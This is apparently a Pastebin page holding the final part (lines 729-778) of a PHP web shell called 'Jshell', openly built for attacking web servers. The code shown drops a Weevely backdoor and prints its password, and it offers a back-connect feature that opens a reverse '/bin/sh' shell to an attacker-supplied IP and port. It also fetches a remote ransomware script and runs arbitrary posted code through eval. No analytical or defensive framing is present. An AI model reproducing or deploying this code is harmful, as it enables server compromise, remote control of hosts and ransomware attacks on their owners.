  729. echo "<center><b>Successfuly called <a href='Jweevely.php' target='_blank'>Jweevely.php</a> !!</b><br/>";
  730. echo "<p>password :: jshellv1 ,<br/> open your terminal and remote weevely :D </p>";
  731. echo "<pre>$ weevely http://".$_SERVER['HTTP_HOST']."/".dirname($_SERVER['PHP_SELF'])."/Jweevely.php jshellv1 </pre>";
  732. }else{
  733. echo "request failed";
  734. }
  735.  
  736. }elseif ($_GET['jshell_act'] == 'lc') {
  737. $js->Jtitle('Localroot');
  738. $js->Jshell_act('lc');
  739. }elseif($_GET['jshell_act'] == 'net')
  740. {
  741. $js->Jtitle('BackConnect');
  742. $js->Jshell_act('bc');
  743. if(isset($_POST['sbmt']))
  744. {
  745. $sock=fsockopen($_POST['ip'],$_POST['port']);
  746. if($sock)
  747. {
  748. echo "<center>Connection estabilished~</center> <br>";
  749. }else{
  750. echo "<center>Connection failed</center><br>";
  751. }
  752. $js->cmd("/bin/sh -i <&3 >&3 2>&3");
  753. }
  754. }elseif($_GET['jshell_act'] == 'rans')
  755. {
  756. $js->Jtitle('Ransomware ');
  757. if($js->Jcaller($js->src_link['ransomware'],'s57rsw.php'))
  758. {
  759. echo "<center><b>Successfuly called <a href='s57rsw.php' target='_blank'>s57rsw.php</a> !!</b><br/>";
  760. }else{
  761. echo "request failed";
  762. }
  763. }elseif($_GET['jshell_act'] == 'php')
  764. {
  765. $js->Jtitle('Eval PHP');
  766.  
  767. if(isset($_POST['sbmt']))
  768. {
  769. echo "<hr>";
  770. @eval($_POST['code']);
  771. echo "<hr>";
  772. $js->Jshell_act('php');
  773. }else{
  774. $js->Jshell_act('php');
  775. }
  776. }
  777. }
  778. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!